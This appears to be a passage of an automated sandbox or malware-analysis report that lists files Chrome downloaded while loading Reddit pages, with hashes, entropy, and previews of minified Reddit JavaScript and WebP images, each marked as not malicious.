                                                  Preview:import{W as e,_ as i,n as t,e as s,c as n,fY as r,f4 as a,fZ as o,f_ as l,aV as h,f0 as d,f$ as u,f2 as m,g0 as c,g1 as T,g2 as E,c0 as I,g3 as p,g4 as _,g5 as v,g6 as g,g7 as V,g8 as C,g9 as f,ga as x,gb as b,f3 as P,gc as O,as as w,A as y,gd as S,bH as L,ge as M,b as A,D,bi as N,bj as R,b$ as U,a as F,dT as W,E as k,P as H,gf as B,aD as Y,dV as G,gg as q,ar as K,T as Q}from"./shell-4994f581.js";import{s as j,a as z,x as $}from"./icon-4d9be652.js";import{A as J,a as X,b as Z,c as ee,d as ie,e as te,f as se}from"./ssa-parser-f2f362d6.js";import{V as ne,a as re}from"./errors-98e883e2.js";import{a5 as ae,bL as oe,bM as le,bN as he,bO as de,bP as ue}from"./club-award-confirmation-client-js-b22d6f4f.js";import{P as me}from"./overflow-menu-actions-fd509c7d.js";const ce=e(j);let Te=class extends ce{constructor(){super(...arguments),this.id="undefined"}static get styles(){return z`:host{display:block}`}connectedCallback(){super.connectedCallback(),this.enableObserver(this.config)}disconnected
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (5135)
                                                  Category:downloaded
                                                  Size (bytes):5200
                                                  Entropy (8bit):5.163677547643872
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D178EF933136DA68CCCB42AB4D17494F
                                                  SHA1:EE722DC40A5F4D5819B51394E24BFA317131133D
                                                  SHA-256:36A2877A0CDE3D2F6288F11748DA9CB88D2925D0DB312340F23FAB5B4233448D
                                                  SHA-512:198044EBF4D2F4A3ACB6ABEFA50C95A98891016C06925FEC8945EA6377FAE028E78B240135FB8C751017D9B7441156B1D8D7D6B7094E28B5AB4A21A012CB9AE7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/alert-controller-client-js-d21c2f4c.js
                                                  Preview:import{t as e,_ as t,g as s,H as n,e as a,n as i,u as r,a as o,I as l,b as c,c as d,cs as h}from"./shell-4994f581.js";import{s as p,x as m,l as u,al as b,A as v,c as g,a as f,I as w,aw as C}from"./icon-4d9be652.js";import{an as k}from"./club-award-confirmation-client-js-b22d6f4f.js";import{r as x,F as y}from"./render-toast-b6f77e7e.js";import{F as _}from"./banned-user-banner-client-js-feaea128.js";import{T as E}from"./index-56e4320e.js";let T=class extends p{constructor(){super(...arguments),this.isVisible=!1,this.alertMessage="",this.isDevelopment=!1,this.appearance="plain",this.openBanner=e=>{const t=e;this.alert=t.detail;const{level:s=n.none}=this.alert,a="Server error. Try again later.",i=this.alert?.content??this.alert?.message??a;switch(s){case n.emergency:case n.alert:case n.critical:case n.error:this.appearance="error";break;case n.warning:case n.notice:this.appearance="caution";break;case n.success:this.appearance="success";break;default:this.appearance="plain"}const r=`Multip
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (856)
                                                  Category:downloaded
                                                  Size (bytes):912
                                                  Entropy (8bit):5.124482623978878
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DAFF1F71A9893E826993B3E1C37BD8F3
                                                  SHA1:778B852F85B3357651BC5EF434B63801637E75EA
                                                  SHA-256:FFFDE3CA0B2E8C2513ABA78FB3A3756FA451E125E12E59852F06668F3820DB69
                                                  SHA-512:33A7CB23C47A0CCA7690C380F97C1EF94BDB2D871A063A88995AEC3AA78B2D6043CFD4897A47E7D54DA566B6B1B15235A8C8F418BEE1DC70511B64BB414FBB78
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/search-dynamic-id-564febdb.js
                                                  Preview:import{aj as t,ak as e}from"./shell-4994f581.js";class s{constructor(t){this.shouldOverrideId=!1,this.activeIds={},this.update=t=>this.set(t),this.reset=()=>this.clear(),this.getKey=t}get(...t){const e=this.getKey(...t);return this.activeIds[e]?this.activeIds[e]:this.generate(e)}set(t,e){return e?(this.activeIds[t]=e,this.activeIds[t]):this.generate(t)}clear(t){t?delete this.activeIds[t]:this.activeIds={}}getUUID(){return this.shouldOverrideId?"id":e()}generate(t){return this.activeIds[t]=this.getUUID(),this.activeIds[t]}}const i=t=>t,r=new s(((e,s)=>`${s}-${function(e){let s=`[q:${e.query}]`;return e.scope.type!==t.GLOBAL&&(s=`${s}--[scope:${e.scope.type}-${e.scope.path}]`),e.sort&&(s=`${s}--[sort:${e.sort}]`),e.time&&(s=`${s}--[time:${e.time}]`),e.pane&&(s=`${s}--[pane:${e.pane}]`),s}(e)}`)),a=new s(i),h=new s(i);export{a as S,h as a,r as b};.//# sourceMappingURL=search-dynamic-id-564febdb.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 96x96, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):1842
                                                  Entropy (8bit):7.885087661247542
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9F697D7F1E96BA76F7E09E0A4CECA471
                                                  SHA1:E7533F00CF5D3A9E2DA940B2ED0A1FE20CDFA1A0
                                                  SHA-256:5DB08BC8F3F66185C50F60A00CD318DE29CF875C9E88A9528B6F6A5F9A92FF61
                                                  SHA-512:8957DBF784F86DE547DC449048B96591EF322BCE76DB00A53FB7A66B0FB0BAED030229C17D37BEAF3BDD373DDC65184E16B42D53F73BF9FA93BF0339EEAE62B2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2vbgl/styles/communityIcon_47xlywkzsy7b1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=7c8a91844f3ee66935dade4a9c794b21077261a9"
                                                  Preview:RIFF*...WEBPVP8 .....!...*`.`.>Q".D..!.|.L8....<.@.J...C.P..Z...........'....@o....G...........x..../.7.6.W.......?............o.......?.........x...e?.?..C.IfB......B..0...%h...G.+q.R.vpX.....10.....A..z.hN...k.NF........e..........ZK...;......L..y.I.r...Y.se.....r;.v.t.'.Z..0....G....1....?..G.y..=..Y..u....<&.........?.g\P..v..\...#....(...n...1c.W..C.~.....Q.G]H..a.=.o.."....m..U.E..yF.....O..r.,...h.G..,..(;.... .....C..Z.VX .cTls...*j;.....O..s..g<..|?.AX....FZ.>.k.\..Z._...W.7..63.X..-)...Ly..0...?.LR.3....b.[........WA.A../..m...;.Y......#..{..(c..y0.^...%..0..9v.......i.w..q.h.s..&5......#.=j.4t..b.B........p_o@..].....RZ~f.[I<...`l."........+.j.(..........o`y....q..4zG...=$Z.h.V..T/n...%e..._.....R.@..:I.R.r..3....P...2../}...Z.*..URo.Bz........t4...9.BU....s.I.>i...J+R.BFn./iy.o.....E.=.....k..lO1D.PI........C.9Z..oaC..........b%...,...9..X....n.@V.@Hi..o.K..W.5....c.......RI./}H...oOv.SC... 4*..8.....g=...ug)...$k......!..A.~:>.=!.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (11066)
                                                  Category:downloaded
                                                  Size (bytes):11121
                                                  Entropy (8bit):5.230746871696104
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E911318539705538FC9E3B9E2C110F76
                                                  SHA1:CA723766700B7872C3CBD78ED3448ED4FEC57DB4
                                                  SHA-256:5AC51347AF2CDDCD7C0FC33888528E4C01399107DCC667358F45DD74122E0CAE
                                                  SHA-512:18717BE022D2FF94BE3F3FEF0E0081ADA4647552830BCE02DCC19C18AE4772565687531E34A82C15B1A61027ED699AA7741B1CCE76573DB54C9D01739E80F64C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-actions-menu-34aa2f08.js
                                                  Preview:import{a as t,t as e,_ as i,n as o,I as s,ah as n,P as r,aG as l,v as a,u as h}from"./shell-4994f581.js";import{s as d,M as c,c as p,aO as u,aP as m,aQ as g,aR as v,U as A,aS as y,aT as b,aU as k,ar as C,aV as S,aq as I,av as w,x as M,aW as R,I as f,A as P}from"./icon-4d9be652.js";import{L as z,l as H}from"./expandable-section-header-e3f969c2.js";import{c as L}from"./content-action-button-5fdf727f.js";import{H as D}from"./community-highlights-3e873ce7.js";import{P as x,c as U}from"./links-27a3f3ef.js";import{M as E,s as B,a as F,h as V,b as j,c as $,d as T,e as O}from"./mod-verdict-9fb8e844.js";import{M as Q}from"./mod-actions-controller-3be29c73.js";import"./select-controller-fa3db659.js";import"./app-selector-client-js-489f074c.js";import"./faceplate-bottom-sheet-header-b31e0ad4.js";const q=t(d);class _ extends q{constructor(){super(...arguments),this.size=z.Medium,this.appearance="content-action",this.viewContext=x.CommentsPage,this.feedViewType=n.ModQueueCompactView,this.itemState=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):40
                                                  Entropy (8bit):3.895461844238321
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:416A96EEDBD0672158196A48237EA32E
                                                  SHA1:BCC4B2993C9F8405776A9A2D336FB9C166A02C46
                                                  SHA-256:A36A8A3C2476795F8123043E2855A3533F7DABDED078697E1D033827E6D0AE51
                                                  SHA-512:E522EABBB00EDFC9563B9A32FDE7E13BFCCFAF3808691228A48972BD500D686AA3ED25CA38710FC367E42C023F448535A96747BC59DB5598BCB132F4B7282F57
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhInCX8Archi4KLFEgUNU1pHxRIFDVNaR8USBQ1TWkfFIWwdHwhGHzvZ?alt=proto
                                                  Preview:ChsKBw1TWkfFGgAKBw1TWkfFGgAKBw1TWkfFGgA=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, Unicode text, UTF-8 text, with very long lines (7504)
                                                  Category:downloaded
                                                  Size (bytes):7567
                                                  Entropy (8bit):5.305802884743551
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DB5F3D4DDF4BD9E23C5DFF1B5C5CE76B
                                                  SHA1:B0131A421EA052CE86397BEEECA463F90F0E069A
                                                  SHA-256:B65FB9E7835F0E283F8FE4B931F8DB79800149FE3DD6598D6F4AC1129B4BDFDE
                                                  SHA-512:C4ED26A703DEE6C73DFEC38021C2E35CA2283D027B941F83D5BF8BE35EF97F1E1162DD91EFA1A1254963C4F8C25ADA3E4A4EB0FA093CFBC0689B764F767A04D5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/feed-feature-client-js-82508c4e.js
                                                  Preview:import"./shreddit-feed-page-loading-7a9d44d9.js";import"./shreddit-post-translator-9cb3ecae.js";import{a as e,_ as t,g as s,n as i,e as o,t as r,aY as a,O as n,b as l,hc as h,P as d,s as c,aW as p,aX as u,aS as m,u as f,v as g,dy as b,K as y}from"./shell-4994f581.js";import{s as v,a as S,x as T,cN as k,I as C,A as E}from"./icon-4d9be652.js";import{cl as w,D as x,$ as R,a0 as P}from"./club-award-confirmation-client-js-b22d6f4f.js";import"./translation-feedback-modal-client-js-8ce911d1.js";import{B as A,b as j,c as N,d as I,e as D}from"./feeds-efba5867.js";import"./base-translator-b41f5754.js";import"./links-27a3f3ef.js";import"./translation-intervention-modal-db1a7e08.js";import"./translations-13fc818b.js";import"./chat-mobile-xpromo-client-js-58e17cee.js";import"./app-selector-client-js-489f074c.js";import"./index-56e4320e.js";import"./banned-user-banner-client-js-feaea128.js";import"./faceplate-textarea-input-ab5075d8.js";import"./text-input-1c750feb.js";import"./index-169ed00b.js";im
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x1138, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):69076
                                                  Entropy (8bit):7.996170885721871
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:2B6B280A66BC56B5EBE8212982E09A89
                                                  SHA1:61AA696C75D8373F465FE7FDD3C2EC7AD608DFE0
                                                  SHA-256:5FB04292074F846D54036B4F5D63E17323B4B57A6F2D6AFDAC8E302D924ED510
                                                  SHA-512:ED9C314D6E5CA7D6CBE7C7A4D39318AB49DC4A9B861764018F318B2F453BA245742B4BDC598DBB742FFF30AE8A0DCD8DC58918D3990A40E3D81A532DF94B46EC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/you-can-tell-how-nervous-she-was-initially-v0-YnpvdjB4YXowZndlMUUgophkhLJnylzJ8sVyIcRak6o06zI0ZNUOcBcLH1GR.png?width=640&crop=smart&format=pjpg&auto=webp&s=33c8ae9116343c843ab2bc706b46d9b593bb2928
                                                  Preview:RIFF....WEBPVP8 ....0?...*..r.>Q&.E..'".PJp...in..{...S..w.o.....?j...._aOq..7..`W.G\...'...O..v_?h..}..{.?.....?...........c....._9.}}%.....y.k.....>...........m.Z...[.......S.?.'.G.?...t.......~.....G._......g.G.W....I.....?......U.o...../.....x..;...?.?..?....e................}.....O.......W..+...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...-..rG...D.7|....Z..;......8:."..].v.<.'&......4.......V..ih?....u../x.:......*\W_...O...UCu...hj...B..v..p.E..G..y.Gh.#m'.......:4..........a...?O.-MR..w..TG...2..]..Bw=.....E.zJV.m.X...3.........s.':..S.!..Prf....y.S.>..sB....=..w'1..{...+...xhP0.....71..B..e.p.L..........v._...`...b..T..5M7.,|.}...Nd2b..[:..v.|.y.^.Us..bL..s...2...~pR.1...r./..7tv./.....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (747)
                                                  Category:downloaded
                                                  Size (bytes):793
                                                  Entropy (8bit):5.254861193583826
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:ECD967F0AE726A84B3ACB46F87FE55A7
                                                  SHA1:AF6068FA5B9FC3FA99EF7AABFA9FABA9F835521B
                                                  SHA-256:62D399CBB5644687003046CD0576D76C7CFE537F3A75BA02843F2D024CAB13B8
                                                  SHA-512:FF461C0A9033880429CD809F80327BECDFF44D831319464E12E766F96197242130B99A3FED69E492C8380A7FE0D6A3DA11443507D568DFEA0C0466E04CA51354
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/gallery-74f99861.js
                                                  Preview:import{b as a}from"./shell-4994f581.js";import{g as i}from"./links-27a3f3ef.js";import{C as t}from"./community-club-highlights-client-js-c7c6ec6d.js";var o;!function(a){a.Forward="forward",a.Backward="backward"}(o||(o={}));const r=(a,i,r)=>{const n=s(a,i.detail.direction===t.FORWARDS?o.Forward:o.Backward,i.detail.prevPositionIndex,i.detail.num_items),d=e(a,i.detail.currPositionIndex,i.detail.num_items);r&&(n.ad_metadata={impression_id:r},d.ad_metadata={impression_id:r}),a.trackEvent(n),a.trackEvent(d)},e=(t,o,r)=>a({source:"gallery",action:"view",noun:"media"},{...i(t),gallery:{num_items:r,position:o}}),s=(t,o,r,e)=>a({source:"gallery",action:"click",noun:o},{...i(t),gallery:{num_items:e,position:r}});export{o as G,e as a,s as g,r as h};.//# sourceMappingURL=gallery-74f99861.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (444)
                                                  Category:downloaded
                                                  Size (bytes):488
                                                  Entropy (8bit):5.158795769562516
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:14882AFAA195A53CFC7009C77ECADEB5
                                                  SHA1:085B17B3ADF643CE6AADE8F61481A82AC0999B86
                                                  SHA-256:5103B89D48D57C80ACD87452D4049B6A6BB4B8B7CC8EA95DC33F9FB92A4027FC
                                                  SHA-512:60672FC590A6C751C6E5A7B6FF9200A11107EC2FFF2BD708AA79DA449DD60765ABE102C8F4FD487F3846D963C480E4A468633DE2B752B535FFDB24C2BADF621D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/index-7436fa38.js
                                                  Preview:var t;!function(t){t[t.NativeShare=0]="NativeShare",t[t.Clipboard=1]="Clipboard"}(t||(t={}));var a=async(a,r=!0)=>{if("function"==typeof window.navigator.share&&!r){try{await window.navigator.share(a)}catch(t){}return t.NativeShare}try{await navigator.clipboard.writeText((t=>{let a=t.title??"";return t.text&&(a.length&&(a+="\n\n"),a+=t.text),t.url&&(a.length&&(a+="\n\n"),a+=t.url),a})(a))}catch(t){}return t.Clipboard};export{t as S,a as s};.//# sourceMappingURL=index-7436fa38.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (8404)
                                                  Category:downloaded
                                                  Size (bytes):8448
                                                  Entropy (8bit):5.343927051944005
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8296B0330CC5FD2BFC1D582712A39179
                                                  SHA1:EB1305CBF1DF33D6CE99EA6B3498168FD681F27B
                                                  SHA-256:5D9408A1CE0A7D16BCEDDC0B3FF97D7A2672E73A9B74412C77C6E40E1EDB0B18
                                                  SHA-512:C311BC310E9EDA94CCADCD610D34E7E62BEE4F46048FC0004DBAE8FF5E262C49E2C2174D16B4E9CEA239D2CC787D9C132ADEFCB0059EEC28AC5EDD0F297A77FC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/links-27a3f3ef.js
                                                  Preview:import{ah as e,G as o,b as t,bH as s,dW as a,ge as n,bD as i,gd as r,dz as d}from"./shell-4994f581.js";import{g as c}from"./club-award-confirmation-client-js-b22d6f4f.js";var u,l;function m(o){return o===e.CardView}function p(o){return o===e.CompactView}function f(o){return o===e.ModQueueCompactView}!function(e){e.SubredditFeed="SubredditFeed",e.CustomFeed="CustomFeed",e.AggregateFeed="AggregateFeed",e.BestOfRedditPage="BestOfRedditPage",e.CommentsPage="CommentsPage",e.Comment="Comment",e.ListingBelowSubredditPosts="ListingBelowSubredditPosts",e.ListingBelowLinkedPosts="ListingBelowLinkedPosts",e.MatureFeed="MatureFeed",e.PopularFeed="PopularFeed",e.ProfileFeed="ProfileFeed",e.ProfileFeed2="ProfileFeed2",e.ProfileTrendingConvos="ProfileTrendingConvos",e.BrandMentionFeed="BrandMentionFeed",e.BrandPostPerformanceFeed="BrandPostPerformanceFeed",e.SearchResultsPage="SearchResultsPage",e.RecommendsFeed="RecommendsFeed",e.RightRail="RightRail",e.ModChatChannels="ModChatChannels",e.ModQueue="
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4712)
                                                  Category:downloaded
                                                  Size (bytes):6593
                                                  Entropy (8bit):5.161051576553408
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DACA3EFFB475257E673FFF3214EE395E
                                                  SHA1:6CDD5EBC3153873B6C90D420FC3218F00248C9EC
                                                  SHA-256:80630CE54C23002968263B74C8ABA7CEA443F4FAA22EEBAC2D26AE82812D6410
                                                  SHA-512:A3D4F2C809E904633C692A44504E6385EBCFD3E1BD9C4A515D09CE21FA6EB8F0A6C788D4613921A6C127BFDAFD378A6B5B837E9EE43E3AEF8843CA98AFA1EF20
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/hovercard.base-1e594a4d.js
                                                  Preview:import{ao as e,_ as t,cJ as o,n as i,b8 as a,aY as s,cK as n,dk as r,cL as h,cM as l,cN as d,cO as p,a3 as c,aS as u}from"./shell-4994f581.js";import{x as f}from"./icon-4d9be652.js";import{aq as v,ar as m}from"./club-award-confirmation-client-js-b22d6f4f.js";import{P as y}from"./rpl-popper-3f91bd17.js";const b=new WeakSet;class g extends a{constructor(){super(...arguments),this.contentSlotRef=s(),this.defaultSlotRef=s(),this.hovercardBodyRef=s(),this.popperRef=s(),this.anchorElement=null,this.interactionController=new v(this,{isInteractedWith:e=>e.open,hoverDelayStart:e=>n(getComputedStyle(e).getPropertyValue("--show-delay")),hoverDelayEnd:e=>n(getComputedStyle(e).getPropertyValue("--hide-delay")),delayOpenOnFocus:!0}),this.placement=y.Top,this.disabled=!1,this.distance=4,this.open=!1,this.skidding=0,this.trigger="hover focus",this.hoist=!1,this.noAnimate=!1,this.arrow=!1,this.eventUsedMap=new WeakMap,this.handleDocumentKeyDown=e=>{"Escape"===e.key&&(e.stopPropagation(),this.hide(),thi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 256x256, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):5812
                                                  Entropy (8bit):7.966262969940671
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2F53F8A19EF2A7FEB86832D68BF0EBD3
                                                  SHA1:9DB912F943A5B770C5FA303F0896B770445A8C36
                                                  SHA-256:6DBA1271B04F9A1BBF3CD5842B25502BB13D00C1A6DAC6242AF391CEA0349FDB
                                                  SHA-512:79DA1542B4B21DA27B24EDD99A07AE2A36F4FD3BE7B37B859A5653D2FA98F1315C99BE08E0B6C52EF798042C1721390773AAB8F5170F20B4D150C00652CE5274
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/X3dq7BwWSNeUHhYVAwg9EWZnzdW0rDaEwG8X76Th8PI.jpg?auto=webp&s=41609c39ac55f81573d212eaf4cf408bb74a3170
                                                  Preview:RIFF....WEBPVP8 .....[...*....>Q$.E#.!.9..8...7~...Ma.../....V...h..~...X_........................s........;.....-.;...........m=@.L...[........y.........[..b'......7.....7..........P..r..../.?..........Xx......`o.~~.Pz.....#.+...[H..a..HF.9X.A..D.:.0..1z...p..e2....c.}dt[p.........v.1@o..P..D..p..U..../.}..T=...k.5..p....B.....e.l..W.....y^}ck..>....O.4...........YyZ.w.......r..[......v..A..."o.nv..z<t&c.bJ.{.U.U_..,..m?,=..dn...Z..6}^....&.......... U<2....dJ.B......1.....cj..J..]H..%-........2.u@......CWA.....n{o1K..'.g.+...r.........=I[C.aA .'.Cs.?..*~.Z. ..iOC..f_p....`.L..SRo.K..'Jd\y.b...Y...$....(...A.......v6..[.i..2..(.8.f....8.EDU..o.t1M.LM.+....Q..w...\.5W...0D.m....N.....W...7...<.fT.k.7k.,.A<v.....vp.c..=."y....7.f.x...&.+..."g......@.......c.6;nS$.....r}..,4M...aC!=/,;......BX,n..4y.[y .X.u....BO.NcY;....e.....Rv.$.ck....i...$...{n...\....M....Pr4G..wM^G..L.....>...3........[.>.:2.,q...7.&..c...`...8..~.........R......
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2833)
                                                  Category:downloaded
                                                  Size (bytes):2908
                                                  Entropy (8bit):5.078655302571661
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9482167FCD6A2FE9234B444BACBAE6C7
                                                  SHA1:0CEA326377A5CC6DFB0B03FE1712C3A30FE0638F
                                                  SHA-256:D84D90BF13D3C8B3113D432FC580D77B5B55F91F64BB9FDDF0AEDA1F931EA5E3
                                                  SHA-512:8FDF206E2D47342755A25004C2762953B156BD534A2A85A3DA091E9AE4621D0EB83DA295F13B45C5FFCE8187E9A04ABEAB9D6D6B559D3802F1926AE5390A6755
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/smart-escalations-provider-client-js-e0225ba6.js
                                                  Preview:import{_ as s,g as t,n as a,e as i,P as e,r as o,gD as r,s as n,T as u}from"./shell-4994f581.js";import{s as l,x as c}from"./icon-4d9be652.js";import"./community-onboarding-completed-modal-client-js-43e757b5.js";import"./rpl-bottom-sheet-8e59d76a.js";import"./index-56e4320e.js";import"./club-award-confirmation-client-js-b22d6f4f.js";var m,d;!function(s){s.READY="ready",s.EMPTY="empty"}(m||(m={})),function(s){s.SUCCESS="success"}(d||(d={}));let h=class extends l{constructor(){super(...arguments),this.pubsub=new e(this),this.isDesktop=!0,this._activateFeature=async s=>o(s),this.initSmartEscalations=async({thingId:s,removalReason:t,authorId:a,subredditId:i})=>{await this._activateFeature({name:r,renderMode:n.Contents,queryParams:{thing_id:s,author_id:a,subreddit_id:i,is_moderator:!0,removal_reason:t,is_desktop:!!this.isDesktop}})},this.performAction=()=>{this.addRemovalReasonStatus===d.SUCCESS&&void 0!==this.smartEscalationsStatus&&(this.pubsub.publish(u.AddRemovalReasonClose),this.smartE
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (773)
                                                  Category:downloaded
                                                  Size (bytes):842
                                                  Entropy (8bit):5.240707056158769
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8C6569ECC48DE7C99CE8C0924B190BE5
                                                  SHA1:CEBBC6B4CA0FE1437DC9E8791F6D97348336DE78
                                                  SHA-256:1872C63753981616BB32A252CF4E0C0B5561D41B0AAE2FC0D10DB45B9A0A9E9A
                                                  SHA-512:A4E4DAACFE3B6BB2E0387601BB2DAC38CD44C3E0B26E7095BF19BF8508CD105BDE1E02340D6F24E47B7440414BF1751F517447168BC5C23958F707E1CF83AEBF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/emoji-template-table-client-js-bd12eb08.js
                                                  Preview:import{_ as t,n as e,e as i,c as r}from"./shell-4994f581.js";import{s,x as a}from"./icon-4d9be652.js";let o=class extends s{constructor(){super(...arguments),this.type="",this.detail={},this.dispatchFromTarget=!1}handleClick(t){(this.dispatchFromTarget?t.target??this:this).dispatchEvent(r(this.type,this.detail))}handleKeydown(t){"Enter"!==t.key&&" "!==t.key||(t.preventDefault(),this.handleClick(t))}render(){return a`<slot @click="${this.handleClick}" @keydown="${this.handleKeydown}"></slot>`}};t([e({type:String,attribute:"type"})],o.prototype,"type",void 0),t([e({type:Object,attribute:"detail"})],o.prototype,"detail",void 0),t([e({type:Boolean,attribute:"dispatch-from-target"})],o.prototype,"dispatchFromTarget",void 0),o=t([i("custom-event-dispatch-wrapper")],o);.//# sourceMappingURL=emoji-template-table-client-js-bd12eb08.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 48x48, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):642
                                                  Entropy (8bit):7.5986890265834095
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:EA9CCE5CA25EAFB795D0B7D1AB565AF1
                                                  SHA1:68D036613AA54BA57404460C6941764AC4543D72
                                                  SHA-256:417B67FAA7F68ADC26CFB80048514F508E2F931BD8C0E04A1A98DD1A22D7A7A5
                                                  SHA-512:9C32374E745CDAFD956570903A3A52CA5D797A55DD2514C67F3E068CF69E9F933EBA85FB07FD881D6F1071887B440707A8AD0E8BC45FA83BCC9300686E37DBDE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2qh13/styles/communityIcon_pldiwqvsyns91.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=e9043964d8308fece087e4f1d3a28c9434a3df10"
                                                  Preview:RIFFz...WEBPVP8 n........*0.0.>Q$.E..!..8....Xw...v}.....-...J...Z.i...,..._.}D...`h......7..-.4.....K.....FcY.....g.......Tu3..{....IT{....}.B....0....$v...v............?.4...-....S....$$.U..O..u.-.*..??..3..O.>e.W....c...a.<.i3.a...+.T.ZS.,..G.bKf..J.i.0O./...e......o..4.^..|;W........t.....=_.....2gx^N...5-pQ......i.....^...C....]....u{k2.=.....^p..v.....G..P|..u....y..IZ..8u...h..3.].%..b...<.7$.=1.G....=....h.o.....Hk...U.....T..[B.l..N...B.)v.Nj.......@/.......?GL.....U....?..6.P2u...o....SQ...!|...}.*.....{.. ./Bt^.bM^.^....P?..1I...94....@KX.O......;.AoA/...*P/...D..yV..W.. ..A?....B...j..)......
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):1986
                                                  Entropy (8bit):7.8754897945208535
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5906C2840FE4BB664808AFD9C09DA7FD
                                                  SHA1:C771B799F8C7AB38E9C943E1BD721F4465ADCDF1
                                                  SHA-256:0C37FB991E4DCC0673BC1D246450F98AD40B16597B6BA7DA6E4A2E242EBBF19D
                                                  SHA-512:3FCE9C34217F7D07F166F2AD9F372A2E3203400CE7C8E3A72484734A3A67C14A5AD31F8C5967880797AA7CE3A2AFA5CCBDD8E11107D60842A976A4DFDC50B699
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2qh1i/styles/communityIcon_p6kb2m6b185b1.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=5feb83c069804a8d8525e9cd17d68958c3d57088"
